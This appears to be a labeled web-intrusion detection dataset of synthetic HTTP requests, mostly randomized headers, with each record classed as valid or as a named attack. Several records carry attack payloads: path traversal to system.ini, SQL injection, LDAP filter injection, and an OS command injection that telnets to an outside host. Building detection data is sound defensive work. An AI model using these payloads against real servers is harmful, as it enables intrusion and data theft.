Warning: 512 93.163.50.162 "gen9b" "Thu, 14 Oct 04 24:38:21 CET"
X-Forwarded-For: 38.253.106.148
X-Serial-Number: 00770838075
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16768
Start - Id: 45783
class: PathTransversal
GET /lnsiialuDtcgcAZY/6Tw/UtwCH_fU.asp?gVkl6zDf06.V=tailibelb%29tr&cnntinu=s0aweCter%29ye&clmrUtose=s%5Cdh&op8i=5094&9icii=mIphhieeae2fok&mHH3PUv@D=cdd%28rlla&htjaehEa=..%5C..%5C..%5C..%5CWINNT%5Csystem.ini HTTP/1.1
Host: 252.96.86.26
Connection: close
Accept: audio/basic;q=0.7, audio/x-wav, video/mpeg
Accept-Charset: iso-8859-5, iso-8859-2;q=0.6, x-mac-turkish, x-mac-japanese, windows-1250;q=0.2
Accept-Encoding: deflate;q=0.0, identity;q=0.6, gzip, deflate;q=0.5, gzip;q=0.9
Accept-Language: pns6mi-t;q=0.1
Cache-Control: only-if-cached
Client-ip: 79.240.194.64
Cookie: zUe= rindausrteht<oo;dmlatp4=7
Cookie2: $Version="65"
Date: Mon, 04 Apr 05 12:39:59 GMT
ETag: "1UYXYoyn1ISOZ-ytTEbk"
Expect: fli7=ifppb
From: LoosDlna@lteruGtlws.de
If-Modified-Since: Tue, 19 Feb 08 24:27:20 UTC
If-Unmodified-Since: Sun, 03 Jul 05 20:05:06 UTC
If-Match: "fblpB6L7vNRFtNzWzlUJ"
If-None-Match: *
If-Range: "Irwt@In046fuLsQ0."
Max-Forwards: 442
MIME-Version: 1.4
Pragma: easherur='y0e7doe'
Proxy-Authorization: Digest realm
Authorization: oexndP er7lw7e=8laieuG
Range: -75,2802-6
Referer: http://www.Dc37o.st/sAeese/eoa1jotT/thea6y/t2seo/e2xDzg.bin
TE: chunked;q=0.1,gzip
Trailer: If-None-Match
User-Agent: Mozilla/9.3 (Windows; U; Win98 8.7; rs-ne; rv:2.9.8) Gecko/62024421
UA-CPU: PowerPC
UA-Disp: 4288,202,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9422x259
Via: tA4cu/1.3 76.219.127.217, 9.4 23.44.129.57
Transfer-Encoding: identity
Upgrade: F3awa4/4.3, 9rim7/0.4, reilie/2.8, 3il/4.5, Stse/6.1
Warning: 610 192.1.135.3:2396 "ysstaeiltotrenks" "Sun, 26 Mar 06 18:59:14 UTC"
X-Forwarded-For: 0.142.120.56
X-Serial-Number: 324157325
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45783
Start - Id: 27417
class: Valid
GET /1D/v3ScCJ2Wv/k0ynw1uC/teL0t0eenpaIdnmideru/FAZ/iMK/a2/T9L/jynhtersobaoR/dFf@m9tdt8wxl4d6TIC.gif?mptgEnaon=oge&rhIehtrrdeaeihe=E&nf=6360&oErdj=+Ri73nui HTTP/1.0
Host: www.r0c8.be:80
Connection: close
Accept: image/*;q=0.4, image/*;q=0.4
Accept-Charset: windows-1257, macintosh
Accept-Encoding: gzip, gzip;q=0.5, compress;q=0.4, gzip;q=0.1
Accept-Language: hew-RdeN;q=0.2, uses-kudj
Cache-Control: a='B'
Client-ip: 152.166.201.43
Cookie: 7cHArFncUxQEX=59
Cookie2: $Version="6"
Date: Thu, 21 Jan 10 08:06:18 CET
ETag: "90lNt1MOgJNu@cgl.25"
Expect: 100-continue
From: mkpuh@Norr.org
If-Modified-Since: Thu, 15 Jan 04 01:41:59 UTC
If-Unmodified-Since: Thu, 31 Jan 08 03:04:46 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 773
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="ouetdaue"
Authorization: ektle by3eeeel=goble
Range: -8,36-7589,6-
Referer: /agNriu1/r1it/h1ft.php4
TE: trailers
Trailer: If-Modified-Since
User-Agent: iehcftsa (civThZRNXv)
UA-CPU: x86
UA-Disp: 7900,686,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 759x1141
Via: HTTP/7.1 134.164.218.32
Transfer-Encoding: gzip
Upgrade: anhok/6.7, tgihE/5.8
Warning: 822 www.aJHeb.gif "Ee3Jmyqt1htasneg" 
X-Forwarded-For: 39.176.137.22
X-Serial-Number: 012150343166763006
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 27417
Start - Id: 41544
class: SqlInjection
POST /thjYQvE/bis/c5Kl4iuE6A2x/eewbcoyy8eawd/nDcXEm5jYD1vyzsQhg/y6JD4GAMV7u8_hRgFAJW/jMcatsoi7tVsp/P7/oOSK7Wy/sYquaEE@JX1eQ@WI/meenhtgaaR.htm? HTTP/1.0
Content-Length: 137
Content-Language: 9a
Content-Encoding: gzip
Content-Location: http://www.alnte.be/ea7vta/3cpfhsd/ospl1.exe
Content-MD5: ZXNuZ2RSbXR0Z2k1MHRzaA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 09 Feb 04 22:57:46 UTC
Last-Modified: Thu, 22 Apr 04 11:06:31 UTC
Host: 206.181.130.62
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.3
Accept-Language: ottr-av5et;q=0.4, nBo-5oera;q=0.0, S-e, eoo-ri0uvoo, enare-qq
Cache-Control: no-store
Client-ip: 163.65.132.10
Cookie: oo=ohe6letixnouhi;iA7heemSe5Oa7e3=45;JED1@Pdelete=pAaodaezwinfrometw;f0xZt-W9kL=otinTm6eh3c8;rNhkoe=U<s
Cookie2: $Version="56"
Date: Mon, 29 Jan 07 18:32:07 CET
ETag: "qo-CqRFe0Y2GKt.7"
Expect: yanx
From: gJohs0a@amewNlgh.cz
If-Modified-Since: Sun, 26 Apr 09 23:35:43 GMT
If-Unmodified-Since: Fri, 06 Feb 09 14:21:04 CET
If-Match: *
If-None-Match: *
If-Range: "EgnwBj1bWO_2vgcmBz"
Max-Forwards: 44
MIME-Version: 6.1
Pragma: 7wtaiorh=tdpcymln
Proxy-Authorization: NTLM VGlESGVlZTFrMWFGNDJmbTltdDVMbzdzcmJ0dGU1d2hvaGVO
Authorization: Basic Mmx3dGF3ZWE6aGVnc0U=
Range: 277481-,6038-
Referer: /uoeoTrm/Isvozw/4teo/tded4yrE/Empenta.tar
TE: trailers,chunked
Trailer: Expect
User-Agent: Mozilla/8.8 (compatible; MSIE 1.0; Open BSD i386; lerIat; ya8lta8)
UA-CPU: StrongARM
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8585x974
Via: HTTP/4.1 193.19.103.148, hesB8e/5.7 46.113.215.20
Transfer-Encoding: deflate
Upgrade: itaut/3.7, drtrlo/0.9
Warning: 751 www.Lnbf.js "segwzwse" 
X-Forwarded-For: 84.75.227.228
----: ----------------------------------------------

esffwyea8sef=;2ee-E7ems?&ietfla0maaiehwv=ps0erodlsln3Ha&eceNielewlrno9h=0227345621&sZyharE7lsr0=OR    'e4te0n' LIKE  'Sim%'

End - Id: 41544
Start - Id: 30758
class: Valid
GET /TKeiecn8as/y9t7ahopi/pbeiftlOdyrUa/eEw3saopeuge4eeS/pnph-/UTw/sulceOii2/oG_/r5V44poeSand@yKF/xtoawezb4n/aahtn.html? HTTP/1.0
Host: 153.228.60.186:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-roman
Accept-Encoding: 
Accept-Language: oeeee-eat, 4j-dw;q=0.4
Cache-Control: only-if-cached
Client-ip: 28.45.221.90
Cookie: suMd2dip=OmIxnctutrmiieu;tiHwmicclte=lTctmaiu;reloeshsa2Au=b67d;aamsTemeC=eiei;wnae5eeode=zkzUp6iwGZ;0ihadmderiau=zhtacceso?527am
Cookie2: $Version="53"
Date: Tue, 22 Jan 08 07:37:30 CET
ETag: "kanm-t42aPExAOvvTB"
Expect: hveiafgs
From: dzpsof6@gehphe0eb.biz
If-Modified-Since: Sat, 10 Oct 09 14:44:16 CET
If-Unmodified-Since: Fri, 28 Mar 08 19:25:41 GMT
If-Match: *
If-None-Match: "Wnx_8rpeQxeic.LQ"
If-Range: "4wkw.k@cBKoAIRmB"
Max-Forwards: 8
MIME-Version: 2.5
Pragma: a='DeNtewo'
Proxy-Authorization: Basic SW5ZZHJxOjdpbWxyZQ==
Authorization: Basic b2V1bnQ6Y2h0cW9lZXI=
Range: 840-5520
Referer: http://www.1pSDent.ch/t50i.htm
TE: trailers,gzip,chunked;q=0.1
Trailer: Host
User-Agent: aMbDiO http://www.2bdc3iz.de
UA-CPU: PowerPC
UA-Disp: 593,0984,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9905x3128
Via: 5.5 www.1oiashhn.css, 0.9 43.240.32.208, 2.6 27.25.214.192:405
Transfer-Encoding: weNi
Upgrade: tmr/9.1
Warning: 994 www.tuorse.js:74927 "slsp2oatzxr0wEyhOhx" 
X-Forwarded-For: 226.201.113.37
X-Serial-Number: 14459
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30758
Start - Id: 23939
class: Valid
GET /r4uritss8menmyisnond/tnRy2AnjOeBcuoA/7auihw/r_rYON87o3QAwmbrF/ogilaihr0ie/dsznvchRnDteO.tiff?dk@kI@.=hctmpot%27y+aar&0t9TVizRLf=070742655&tnegr8Bu1k=f%27script HTTP/1.1
Host: 6.218.102.4
Connection: keep-alive
Accept: image/jpeg;q=0.4
Accept-Charset: windows-1251;q=0.5, iso-8859-1, cp-950;q=0.6
Accept-Encoding: deflate, compress;q=0.6
Accept-Language: *
Cache-Control: max-age=9243
Client-ip: 238.183.7.187
Cookie: teErhedrojfd=n;cVe3yiae=nWmb;0seehicnsn=srGPSf
Cookie2: $Version="2"
Date: Fri, 23 Apr 04 10:10:43 UTC
ETag: W/"JhRUUOk2j3NFjJPyNbQn"
Expect: 100-continue
From: irliyiyI@8ciiyp.be
If-Modified-Since: Wed, 09 Jul 08 02:31:14 GMT
If-Unmodified-Since: Wed, 21 Jan 09 14:59:47 CET
If-Match: *
If-None-Match: "H8e9cD.2zn9JdCTf"
If-Range: *
Max-Forwards: 224
MIME-Version: 9.2
Pragma: ebn4i='a'
Proxy-Authorization: ers8 j6eroeoe=halr4
Authorization: Digest qop=lposmlDo
Range: 074-7647,9-,-3
Referer: /2aHdt.css
TE: chunked;q=0.3,gzip;q=0.9,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/7.7 (Machintosh; U; Mac OS X 0.4; ci-iO; rv:8.4.1) Gecko/01450402
UA-CPU: StrongARM
UA-Disp: 9255,4027,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 916x209
Via: FTP/2.6 55.185.220.153
Transfer-Encoding: identity
Upgrade: tehni/0.9, Cea4fl/2.0, ztoh/4.3, pe6/2.9, ad9/9.3
Warning: 790 171.116.173.213 "hopsown6nqcIceI3A" "Sat, 01 Oct 05 02:13:23 CET"
X-Forwarded-For: 220.20.217.236
X-Serial-Number: 149109156633944
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23939
Start - Id: 23903
class: Valid
GET /thMN@3o6X9Iv7ud/samXXkechoHO/N4Vzgmua/sznk4_O_/UJX-JrcpGYoZ4_/itm7tezstt5dst/bdotaa/sEh4vOuMGbNy/6X2iB1pzwarSNj/hMmAEiy@F/1VWKw..gif?ex4cl=yuni&wrunsaeoaspg=E7&a9e7ieso=nxmlpa&aEtsdq=99&r0ea=476180438&lm4hutmE=tIK_HOg&JX@_.76nodeYct=dbodyrainhd&Tecswe1gp=o%3BdvOsleoe%29mooi8o&eanethbvhie=35%3Dubjc&e0t=37166&mlnuTi=c5eeacaza%2B+2+&ad3seeanr=enco&er=oeasbkcpe&gEu=en5nssi2 HTTP/1.1
Host: 135.28.207.238:80
Connection: close
Accept: text/*;q=0.5, text/xml, application/rtf;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: cnsfmle-eott, mnt7aRu-utval;q=0.5
Cache-Control: min-fresh=25
Client-ip: 230.97.196.117
Cookie: vhngamfIeseym=skdStowev3cxcznac;rKmaazzldEeyy=dI's~rZnsa];YtpPzSKF=9272
Cookie2: $Version="9"
Date: Mon, 11 Sep 06 10:25:34 CET
ETag: W/"@z6fB-Sjlo3J0-J"
Expect: 100-continue
From: nt7rur2b@ieUStzn.biz
If-Modified-Since: Sat, 02 Aug 08 15:26:39 GMT
If-Unmodified-Since: Sun, 17 Jan 10 18:49:28 CET
If-Match: "XYx2PWSeS2QofeTQUUSz"
If-None-Match: "cA3cbXqiA7Zyg-n2"
If-Range: Tue, 09 Jan 07 16:28:08 GMT
Max-Forwards: 7100
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: 1m1o hniwe=rioiti
Authorization: sa6eo qtbeOxRl=edKtdt
Range: 816-01,27-
Referer: /ho4n/oq6pvem/vhwrie.aspx
TE: trailers
Trailer: Via
User-Agent: Mozilla/6.4 (Machintosh; U; Mac OS X 2.7; 0s-1a; rv:9.6.8) Gecko/38008728
UA-CPU: Sparc
UA-Disp: 722,7012,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7253x9892
Via: 0.5 23.102.47.220, 2.9 221.113.209.231:89484, HTTP/0.0 www.6anscx.js
Transfer-Encoding: oahi
Upgrade: mhT/3.3
Warning: 941 www.oEhntdsr.htm "tUs5csE0e0rt17tgQw6" 
X-Forwarded-For: 8.218.42.202
X-Serial-Number: 983767381261855
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23903
Start - Id: 22213
class: Valid
GET /oDe/cHgQAxYneGq.exe?Yixn2aayioGt=tApHt HTTP/1.1
Host: www.4muhraipl.cz
Connection: close
Accept: video/*;q=0.2, audio/*
Accept-Charset: iso-8859-3, x-mac-greek, iso-8859-7, koi8-r
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 250.180.79.172
Cookie: fpdbt=replacecib;bgwA3P7kBp=i1odh;eytFojesbE=k%eot0y;Ra3hhaidetsjoi=ebIe/r;ldiwxdtzKSsoCdt=80
Cookie2: $Version="1"
Date: Wed, 21 Mar 07 04:36:02 UTC
ETag: W/"JVbXKO-H7teQCYptg"
Expect: 100-continue
From: rieeIocb@sQdze6ug.uk
If-Modified-Since: Thu, 04 Dec 08 08:52:19 CET
If-Unmodified-Since: Sat, 27 Jun 09 21:31:39 GMT
If-Match: *
If-None-Match: "SHMnr1XZ.OQdrZ_mh"
If-Range: "utJYPPeCgJDUW4ZQYJsb"
Max-Forwards: 0
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic aElycnJ0OmVydHU=
Range: -09
Referer: /atObwie.png
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/8.6 (X11; U; Solaris 7.3; lD-dt; rv:7.8.4) Gecko/46628781
UA-CPU: Sparc
UA-Disp: 425,349,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 766x8565
Via: 2.0 www.ryRb.html
Transfer-Encoding: Qahe; m22n7ihn=hKnre
Upgrade: tmok/9.0, unq6a/6.8, to6le/2.7
Warning: 471 www.ihhsmu.html:12 "iviIgox" 
X-Forwarded-For: 11.11.146.50
X-Serial-Number: 29292278992836758450
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22213
Start - Id: 33745
class: Valid
POST /teU/iifeRftN/fnEscchdTtnnehd/mJ/uXO-xl1xK2wh/-IyI2processing-instruction3yH/e6Z7PEs.i/d_fXSPd6gnk5kgvH3i79/oAd8rewMc.06@ZyC-J/Z3RQzsYspassthruX0S/pEs6oa.php? HTTP/1.1
Content-Length: 262
Content-Language: etenteO,trjcA,ereRqeh
Content-Encoding: gzip
Content-Location: /hoelth.cgi
Content-MD5: aGh0dGVua2VnT2liYmR1bA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Apr 10 02:37:43 CET
Last-Modified: Mon, 25 Feb 08 16:35:23 CET
Host: 22.50.121.156
Connection: close
Accept: text/*, application/*;q=0.1, video/quicktime;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: wKdihpe-EieIn5, ruu-n, sg-pe8Reiva, zwm8tyff-Luio;q=0.0
Cache-Control: no-store
Client-ip: 42.66.55.236
Cookie: SjaUeez3Msdba=oCoz1Um70lJK;itoese4ida=nr/ri;c2CdSe7cb=Rftp4
Cookie2: $Version="69"
Date: Fri, 13 Feb 04 16:26:13 GMT
ETag: "sRRxnJ6Z_qxKvecEKi.-"
Expect: 100-continue
From: ocSTi@saeeTeucT.ch
If-Modified-Since: Thu, 17 Jul 08 22:37:54 CET
If-Unmodified-Since: Sun, 12 Dec 04 18:20:11 UTC
If-Match: "WpK.PbRPST8WgJ0"
If-None-Match: "8e9.5NGFQ@I3.fXSCM-"
If-Range: Fri, 06 Jul 07 12:59:16 CET
Max-Forwards: 9
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: dotzna obUns=tvetsd
Authorization: Basic MmhuaGQ6bHNucg==
Range: 157212-,-82365,95975-54243
Referer: http://www.pLekhaP.cz/oal8oz7a/Nu7tubey/eSoli/oaAduor/5ede.swf
TE: gzip;q=0.9
Trailer: Authorization
User-Agent: eGEim/4.7.6.4
UA-CPU: StrongARM
UA-Disp: 020,4035,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 520x205
Via: 8.9 11.238.25.136
Transfer-Encoding: compress
Upgrade: emiexT/3.0, iinIni/9.7, efhial/0.0, rndpy/6.5, en3mcn/3.8
Warning: 146 www.heyaohc7.png "iqTeaiaieCen" "Thu, 28 May 09 11:14:53 UTC"
X-Forwarded-For: 79.156.30.170
X-Serial-Number: 695598853636
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

x9oouamavE8tsce=1017&mg9et22zushvhee=9964320&aanht1ntMh=stdinh&ndnriaokt=q78E&thaionf2eg=f(sht&ieafs=/:&sozrqNn=tsK-ai&Dhj7JusrgQiframeZ=zenefvlgeu&ndJuh1IV=i&st9Lhen1osn=iws&sss8erUli=thscript&srlsetsr=167166191&s2eNrtttFtiaeSh=xml&tstitaovfo5esi=80361025

End - Id: 33745
Start - Id: 43547
class: OsCommanding
GET /lo7QnGeu-i_/coud5m8r/pIvYR9LDZhPLk/NHOetroeii4diu.cfm?ISR96=1852823386&ezsnmthtmcettN=%5C%22++%5C%3B++++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet++++www.strotrndolar.com+3845++++%3B&cTdileo2fpo1ch=1332077&msNothh=nncn2tl5 HTTP/1.0
Host: www.9s8oNbz.cz
Connection: keep-alive
Accept: application/rtf
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=85
Client-ip: 214.70.1.175
Cookie: mtcaktjtsoRnl=ofrom;V@4PxVQ63=aJ_@OzJWwv3d;dd=55
Cookie2: $Version="17"
Date: Fri, 18 Apr 08 18:00:01 UTC
ETag: "60KWnTBuO0WR3pn7X4Yx"
Expect: 100-continue
From: nsaoonaw@rhao6t.cz
If-Modified-Since: Sat, 10 Dec 05 16:02:59 GMT
If-Unmodified-Since: Thu, 16 Jul 09 14:07:32 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 13 Dec 07 06:52:24 CET
Max-Forwards: 34
MIME-Version: 9.7
Pragma: SRbdEojh='dtoobay'
Proxy-Authorization: Basic c2NndDpFRWhiaHQ0
Authorization: NTLM dDZydXRoc2g4d2Uwc2Y5eHJzdDJwaGV5THR0b2lzd2l0ZUdvZnNpZWg=
Range: 1-
Referer: /i3afsl.html
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.6 (Machintosh; U; PPC Mac OS X 4.2; ui-cP; rv:6.4.4) Gecko/48454018
UA-CPU: x86
UA-Disp: 484,9177,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 559x227
Via: 8.5 131.17.146.193, 6.4 www.otiem0Rt.jpeg, HTTP/7.8 www.tec9.htm:6
Transfer-Encoding: compress
Upgrade: Bo4/0.1, iai/6.5
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 92.181.164.255
X-Serial-Number: 431097380
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43547
Start - Id: 22308
class: Valid
GET /aX1JD6gD.php3?rt33rtoutrth=17239&gwL5XwhereU2HgAW=OgrEaYntsivmgo&ySdoronr=65 HTTP/1.1
Host: www.e6woit.biz
Connection: a3Neiraa
Accept: */*;q=0.0
Accept-Charset: x-mac-arabic, macintosh;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 130.148.29.214
Cookie: QzreYhsaZ=100388;ee9Tpme6Ee1s=0&S;iCaiwHttl=l@Btmv4jN6;Et10Aaoels=10WlxyOD1d;npenAetlnonnHan=cMLXIhlaYw
Cookie2: $Version="57"
Date: Fri, 21 Jul 06 15:05:51 GMT
ETag: "Q6r-.ZHASE_U9EZ2b"
Expect: 100-continue
From: auRypu@Ia7irt.fr
If-Modified-Since: Mon, 28 May 07 23:58:51 CET
If-Unmodified-Since: Fri, 08 Jan 10 19:05:47 UTC
If-Match: "1TySx0BfA0iqQuVpJi9"
If-None-Match: "0oxB@8-qx-cYi5IT@"
If-Range: *
Max-Forwards: 91
MIME-Version: 7.8
Pragma: noik='xttorSrE'
Proxy-Authorization: NTLM Z3A1dE8wdEh0YW9mb2RhZWE0czdlczZjODMyQ290cnRtYTF0NHc=
Authorization: NTLM OWRybjNlT3ppaDlUb25lcm9mOGxpbGN4ZWltb2hySW1jaDBpcGhzZWFnbG5sZQ==
Range: 394544-569495,98730-
Referer: /ftiLe.mspx
TE: chunked;q=0.0,gzip
Trailer: Host
User-Agent: Mozilla/9.6 (Windows; U; Windows NT 7.1; bK-ly; rv:9.6.4) Gecko/46251807
UA-CPU: Sparc
UA-Disp: 730,116,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 6713x3375
Via: 7.5 www.faorntit.js, 7.9 153.76.135.117, 0.6 www.ercxt.html
Transfer-Encoding: deflate
Upgrade: eOhtM/9.6, icm/5.3, zas/4.8
Warning: 843 www.adohsb.htm "WSAE4akma" "Sun, 13 Aug 06 21:26:39 GMT"
X-Forwarded-For: 148.120.96.11
X-Serial-Number: 8809830
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22308
Start - Id: 38694
class: LdapInjection
GET /JstyleFhrEdKM@G2/ekEU.3yUKnmI/t5WY8D7nGjXo7hj@Bm/oyejJH6HWZ/h1hNertktroIgrtnNlu/sGOZ-.fYCx7pmbrE@94/gT0uy5ctneeen.tiff?__t0cmd=%29+++%28++%7C++++%28+cn%3D*o+%27brien*++++%29%28mail++++%3D*o++%27brien*+++%29++&2taellm4p=83&t8ftnt33tll=idnEecmbinu%24ipselectdie%7C6%28&u0IfDftpvI2n=80 HTTP/1.0
Host: www.NXcoieer.com:80
Connection: zvA1srs
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: soH1nhTp-soce;q=0.6
Cache-Control: min-fresh=4889
Client-ip: 218.181.248.159
Cookie: 3rdeoenIsIn5t=276;connectb.xtermVAJ4-Co=4;@_LKP%u=duts;zM-t=4095580;ufeas=130
Cookie2: $Version="63"
Date: Wed, 12 Sep 07 17:40:40 UTC
ETag: "fO3hMoGbmyhoF4WVadN_"
Expect: ribEgiA=itelO;odita
From: nTromT8u@pzcel.it
If-Modified-Since: Fri, 03 Aug 07 10:34:50 GMT
If-Unmodified-Since: Thu, 13 Aug 09 17:37:05 CET
If-Match: "nArH4aYAaWqdjwu"
If-None-Match: "82WF.AE6RI@rmqrM99"
If-Range: Sat, 07 Apr 07 14:03:42 GMT
Max-Forwards: 754
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest realm
Range: 32-1,3888-481886
Referer: http://www.5hate.biz/isDae/9johHmer.js
TE: deflate;q=0.7,trailers
Trailer: Cache-Control
User-Agent: Mozilla/4.0 (compatible; MSIE 5.4; SunOS sun4u; 5ePeao; fnolEe)
UA-CPU: 68000
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 420x9995
Via: 0.1 www.dida.jpeg, 3.6 178.2.65.161, tkUtN/6.4 www.dyvlseh5.htm
Transfer-Encoding: gzip
Upgrade: s1i4r/2.1, mrhpoe/7.3, dua/2.5, lrn/6.4
Warning: 442 77.207.105.249 "n0tcfehentkl" 
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 7677444389981478018
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 38694
Start - Id: 13901
class: Valid
GET /heue/dsmpemtanTp/tS6Btt76OuCuXmB3/es/qip/e4fqw/tN3Bj@xkiwQ.5GlZzG/suajn/k@8.png? HTTP/1.1
Host: www.udmbgeosl.it:2
Connection: close
Accept: */*;q=0.6
Accept-Charset: euc-jp, x-mac-ce;q=0.7
Accept-Encoding: *;q=0.5
Accept-Language: peet-o;q=0.2, frei-fhoymil, eat-xaa
Cache-Control: no-cache
Client-ip: 34.251.248.22
Cookie: erShluSnehdz=iL&(a-;evst4sz=hrvNtso4ue
Cookie2: $Version="052"
Date: Sat, 01 Mar 08 08:37:48 UTC
ETag: W/"ZilqZGYy.WYdZlR"
Expect: 100-continue
From: mshmtny@eieiosii.fr
If-Modified-Since: Wed, 25 Jun 08 08:05:46 GMT
If-Unmodified-Since: Tue, 21 Mar 06 13:25:55 CET
If-Match: "KScK8M2E0-inNCvp6.4"
If-None-Match: *
If-Range: *
Max-Forwards: 915
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest username="oa1hT"
Authorization: Digest nc=Adb5dFa6
Range: 914-
Referer: /weeie/eXrg/d6l4scle/itphion/attya.asmx
TE: trailers,deflate,trailers
Trailer: Range
User-Agent: ssydh (ezBt0o; oqQsI5wT; lzK9kRsG; slTGzbj)
UA-CPU: Sparc
UA-Disp: 215,5211,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7739x7906
Via: 3.4 www.nk6auei.css, 0.0 www.ajepe.jpeg
Transfer-Encoding: gzip
Upgrade: ujteh/5.0, sh2/9.2, nct9Z/8.1
Warning: 226 www.ron6ossd.html "caara4shihtlmela" 
X-Forwarded-For: 150.165.127.46
X-Serial-Number: 02052575004924
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13901
Start - Id: 16352
class: Valid
GET /q0nMtn/aCy.YaMAIi0Jln-6g/dcd8uibotaeoe0t9tAa/sIct9mctsetdEngssr.shtml?niizamosanahhs=466987 HTTP/1.1
Host: www.8nh4.uk
Connection: keep-alive
Accept: video/*;q=0.3
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.8, identity;q=0.5, identity;q=0.6
Accept-Language: 2no6y-am0teh;q=0.3
Cache-Control: max-age=6170
Client-ip: 30.8.44.125
Cookie: etThhpYram=I6o;9coslipeaeFhoni=40
Cookie2: $Version="88"
Date: Tue, 16 Feb 10 09:52:46 UTC
ETag: W/"gxr_NsvJNHs7kUt3"
Expect: 100-continue
From: ecDNddEy@dflrto.st
If-Modified-Since: Wed, 15 Aug 07 02:10:13 UTC
If-Unmodified-Since: Tue, 22 Jul 08 20:20:01 CET
If-Match: "DoE1irNJGp35nmLhkeX"
If-None-Match: *
If-Range: "GvfLeig@7ZgpPLXF"
Max-Forwards: 2
MIME-Version: 3.9
Pragma: tqraecc='iot3'
Proxy-Authorization: NTLM dGJlcjJlb1l3ZW9hc25zZHJlMHQ5ZW5pZkRuTGRsaWU=
Authorization: NTLM MmlpZzZkcG9hb21zc3lkd2V0ZW4xOUhIeWF3eWRudWlhZXVyaTdhYg==
Range: -652120,9-,091-
Referer: /wspoErue/bfs5h49e/nanfe4oa/ate4.asp
TE: chunked;q=0.9,gzip;q=0.8,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/7.6 (Windows; U; Win 9x 2.1; vu-hu; rv:0.2.6) Gecko/48227283
UA-CPU: Sparc
UA-Disp: 195,2226,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8398x061
Via: 0.3 www.qaletA.html
Transfer-Encoding: identity
Upgrade: oE3e1/2.9, FMnex/9.0, o72ibo/5.9, dtimd/8.4
Warning: 799 www.moaimt.jpg:7272 "O1enqniO8" "Mon, 09 May 05 14:13:25 CET"
X-Forwarded-For: 33.237.44.240
X-Serial-Number: 87401
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16352
Start - Id: 12943
class: Valid
GET /edD3ceiy/DeoinaHne/naq0AaadoeudmedMei/8ThfkBjm8w/iHGu@qxA8tjct6ZP6tG/4WgIpAHV/6x21lLWS0L6jguM1Rbk/FjxbFcViO.js? HTTP/1.0
Host: www.mayrneitoa.org
Connection: keep-alive
Accept: video/*;q=0.5, text/*;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 97.163.108.195
Cookie: errcJomo62tS=vWvWq;soraAdunss=4854;alafrOgwyq=otdO4ohono;xeaaea2en=80;aa=ce4 NePx4includee<
Cookie2: $Version="97"
Date: Mon, 12 Apr 10 09:08:01 CET
ETag: W/"i1yF.eyf4zILE.k"
Expect: ihGd9=n13TTc
From: I3hnmy@0fhsF.net
